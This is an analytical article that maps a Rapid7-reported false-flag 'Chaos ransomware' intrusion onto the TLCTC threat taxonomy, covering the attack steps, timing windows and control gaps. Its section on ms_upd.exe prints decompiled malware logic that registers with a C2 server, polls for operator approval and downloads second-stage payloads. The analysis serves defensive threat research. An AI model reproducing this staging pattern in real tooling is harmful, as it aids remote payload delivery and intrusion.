Chaos Ransomware: A Rapid7 Analysis Through the Lens of the TLCTC

Rapid7's Threat Research team published a careful forensic narrative in early 2026 of an intrusion branded as "Chaos ransomware." Their central finding is striking: the threat actor used a Ransomware-as-a-Service skin as a false flag, while the actual operation was state-sponsored exfiltration — no files were ever encrypted. The branding was disguise.

That kind of finding is exactly where outcome-oriented taxonomies stumble. If your taxonomy reasons about "ransomware" as a category, an incident in which no encryption occurs becomes hard to talk about — yet operationally it is still a textbook case of social-engineering → identity theft → execution → exfiltration. The TLCTC v2.1 framework is built precisely to ignore the brand, ignore the actor, and ask one question instead: which generic vulnerability did the attacker exploit at each step?

This piece walks the Rapid7 incident through that lens. The path is short, every step is non-obvious in at least one way, and the Δt profile reveals a structural detection window that the "ransomware" framing would have hidden completely.

IThe Attack Path

Seven classified steps, one bridge crossing, one outcome — and the FEC chain splits at an operator gate that's invisible from the outcome label.

The compact TLCTC notation for the entire incident:

#9 ||[human][@Attacker⇒@MSTeams→@Org]||
  →[Δt=?]     #4
  →[Δt=?]     #1
  →[Δt=?]     #4
  →[Δt=?]     #1
  →[Δt=~5s]   #7   // first FEC wave: DWAgent + AnyDesk + ms_upd.exe
  →[Δt=?]     #7   // after operator approval: Game.exe stages
  + [DRE: C]

Step 6 and Step 7 are both #7 — and that's deliberate. Per R-EXEC, every distinct FEC execution gets its own #7 step, and the s6 → s7 transition is the operator-gated approval flag visible in the decompiled ms_upd.exe main routine. Splitting them at the gate exposes the velocity story that consolidating them would erase.

Rendered as a flow:

Three things in that diagram are not what an outcome-oriented reading would predict. First, the path contains two #4 steps separated by a #1 step — that is the load-bearing Axiom-X structure of the incident. Second, the FEC chain itself is two #7 steps separated by an operator gate — not one consolidated malware blob — and that split is what makes the velocity story visible. Third, there is no encryption — the path closes on confidentiality loss only, despite the "ransomware" label on the tin.

IIThe Boundary Crossing

Microsoft Teams isn't an attack surface here. It's transit — the carrier, not the target.

Every bridge cluster (#8, #9, #10) requires a boundary operator. For social engineering, the syntax is ||[context][@Source→@Target]|| with optional transit annotations. The interesting question is: what role does Teams play?

IIIThe Steps, in Detail

Each cluster choice is justified by exactly one R-* rule. Where two rules could plausibly fire, the rationale identifies the deciding evidence.

IVVelocity Profile

Most transitions are unobserved (Δt=?) but two are decisive: an operator-gated VC-2 stage that gives defenders time, and a 60-second beacon that takes that time away.

The VC-2 lane is the headline finding. Decompilation of ms_upd.exe's main routine shows it registers the victim with the C2 (L"/register"), then enters a while(1) loop polling L"/check" for an operator's approval flag. Game.exe is staged only after a human on the C2 side approves the victim. That is fundamentally a hand-curated APT cadence, and it produces a real defensive opportunity:

VFour Decisions That Could Have Gone the Other Way

Each of these is the kind of call where TLCTC's axioms deliver an answer outcome-based reasoning cannot.

1. Is the MFA-device-add part of the #4 chain, or its own #1?

Its own #1. The attacker is not presenting credentials at this step — they are operating an existing feature (self-service MFA enrollment) of the IAM system. Axiom VI's "one step, one generic vulnerability, one cluster" prevents merging it with the surrounding identity-theft activity. The "Perfect-Implementation Test" is decisive: a flawlessly coded MFA enrollment endpoint still permits this attack as long as it allows self-service enrollment after primary auth.

2. Are DWAgent and AnyDesk #7 (malware) or #1 (legitimate-tool abuse)?

#7. The v2.1 definition of #7 explicitly includes "dual-use tooling when it executes attacker-controlled FEC." The signed-binary status of these tools is irrelevant to the cluster — what matters is that they are foreign content executing under attacker direction. The earlier #1 step (Step 5) records the attacker's invocation of legitimate facilities (curl, installer); Step 6's #7 records the resulting FEC execution. Both R-EXEC and the LOLBAS clarification line up on this division.

3. Does the "Donald Gay" code-signing certificate trigger #10 Supply Chain?

No — at most a low-confidence alternative annotation. The certificate is best read as an evasion characteristic of the #7 step, not a separate Trust Acceptance Event.

The defensible #10 reading would place a ||[code-signing][@MicrosoftCS→@Org]|| at the moment Windows honors the signature. R-SUPPLY's falsifiability test passes weakly (removing the trust link would invalidate the evasion benefit). But the article does not show a specific control bypass that hinges on the signature — no AppLocker publisher rule pass, no SmartScreen story. FEC execution would still occur on most enterprise endpoints. And #10 is operationally most useful when the trust link is specific to the target's supply chain, not the global OS code-signing CA where TAE attribution is too diffuse to be actionable.

4. Should the path close on [DRE: C], [DRE: Ac], or both?

[DRE: C] only.

Recording [DRE: Ac] because the report uses the word "ransomware" would be a direct violation of Axiom III. The Chaos DLS is psychological extortion pressure built on top of confirmed exfiltration — but extortion is not a DRE, and the absence of an encryption event means the path closes on confidentiality loss alone.

VIInside ms_upd.exe: The Operator Gate

A close reading of the decompiled main routine reveals a manual approval step — and rewrites the velocity profile.

The published decompilation of ms_upd.exe's main function is short and revealing. After enumerating client info, it builds a registration JSON:

// Reconstructed from decompiled ms_upd.exe
MWF_PrintfWrap(OptionalData, 1024,
  "{\"client_id\":\"%s\",\"computer_name\":\"%s\",
    \"username\":\"%s\",\"domain\":\"%s\"}",
  gRegistrationData, ...);
MWF_C2Comms(L"/register", OptionalData, ResponseBuffer, 4096);

while ( 1 )
{
  if ( !MWF_C2Comms(L"/check", OptionalData, ResponseBuffer, 4096)
       || !MWF_CheckIfApproved(ResponseBuffer)
       && !MWF_CheckIfRetry(ResponseBuffer) )
  {
    goto RetryConnection;
  }
  // only here does the second stage download begin
  MWF_DownloadFile(L"/download/Game.dll",  FileName, ...);   // → WebView2Loader.dll
  MWF_DownloadFile(L"/download/Game.exe",  MainPayload, ...);
  MWF_DownloadFile(L"/download/Game.config", FileName, ...); // → visualwincomp.txt
}

Three things stand out:

• The MWF_ function-name prefix appears throughout the binary — plausibly "MuddyWater Framework" tradecraft. Per Axiom IV this does not affect cluster classification, but it strengthens attribution.
• The /download/Game.dll file is saved on disk as WebView2Loader.dll. This confirms the filename-masquerade pattern: the file is attacker-built FEC, not a legitimate Microsoft DLL.
• The while(1) polling loop is the operator gate. MWF_CheckIfApproved tests a flag set by a human on the C2 side. Until that human approves, no second stage is delivered.

This is what makes the velocity correction important. The naive reading would put the ms_upd.exe → Game.exe transition in VC-3 or VC-4. The decompile says VC-2 or even VC-1 — and that's the difference between "human SOC cannot help" and "human SOC absolutely can, if they have the right egress signature."

VIIControl Gaps, Keyed to the Clusters That Fired

Every cluster on the path defines its own control regime. Recommendations follow the cluster, not the outcome.

The structural insight worth repeating: Steps 3 and 4 are connected by a sub-second Δt — pure SOC-analyst review will not intervene in time. The only reliable break point in that pair is automation at Step 3 (block on new-device-enrollment from unfamiliar geo immediately after first auth from same geo). This is the kind of architectural conclusion you reach from velocity profiling, not from MITRE-technique counting.

VIIIIndicators of Compromise

Including IOCs only visible in the decompiled source — paths and C2 endpoints that don't appear in the article body.

IXClassification Verification

The R-* compliance checklist for this analysis.

• Axiom III · No outcome-as-cluster — "Chaos ransomware" treated as outcome label only; no [DRE: Ac] recorded because no encryption event occurred.
• Axiom IV · Actor identity does not drive classification — MuddyWater attribution is contextual, not structural; the MWF_ tradecraft signature is noted but not assigned a cluster.
• Axiom VI · Single cluster per step — MFA-add separated from credential-use (Steps 3 vs 4); curl/installer invocation separated from FEC execution (Steps 5 vs 6).
• Axiom X / R-CRED · Acquisition vs application kept distinct — #9 acquisition (Step 1) → #4 application (Steps 2 & 4) preserved as separate steps.
• R-EXEC · Every FEC execution is #7 — DWAgent, AnyDesk, and ms_upd.exe fire R-EXEC under Step 6; Game.exe fires R-EXEC under Step 7. The two #7 steps are split at the operator-approval gate inside ms_upd.exe, exposing the human-paced transition rather than burying it in prose.
• R-SUPPLY · #10 only at TAE — "Donald Gay" cert considered and explicitly rejected as primary #10; logged as low-confidence analytical alternative only.
• R-TRANSIT-3 · Vendor on target ≠ transit — Teams treated as transit relay (no Teams CVE involved); R-TRANSIT-3 does not promote it to attack surface.
• R-INTRA-7 / R-INTRA-9 · No memory boundary used — no intra-system boundaries needed for this incident.
• R-UNRES · No ? / … used — all Δt=? are known-step / unknown-time, not unresolved-cluster.
• DRE only on classified steps · [DRE: C] attached to Step 7 (Game.exe exfil); none on Δt-unknown edges or on the operator-gated transition.

XWhat the Brand Hides — and What the Path Reveals

Reading the Rapid7 incident through TLCTC produces five conclusions that are awkward or invisible under outcome-based framings:

1. "Chaos ransomware" is brand, not behavior. The path closes on confidentiality loss alone. Treating the incident as a ransomware case would have you reaching for ransomware-shaped controls (immutable backups, decryption resilience) when the actual leverage points are MFA-enrollment guardrails and egress detection.
2. The MFA-add is a #1, and that matters. Without separating it from the surrounding identity-theft chain, the highest-leverage detection point in the entire incident becomes invisible — buried inside a generic "valid-accounts" technique label.
3. DWAgent and AnyDesk are #7, not "legitimate tools." Their signed-binary status is an evasion characteristic of the FEC step, not a reason to declassify it.
4. The operator-gate is the defender's slack. Decompilation shows a VC-2/VC-1 transition in the middle of an otherwise VC-3/VC-4 chain — and that's where the affordable detection sits.
5. Attribution doesn't drive classification. Whether this is MuddyWater or someone else does not change the path. That stability is exactly what Axiom IV is for: the cluster structure survives attribution revisions.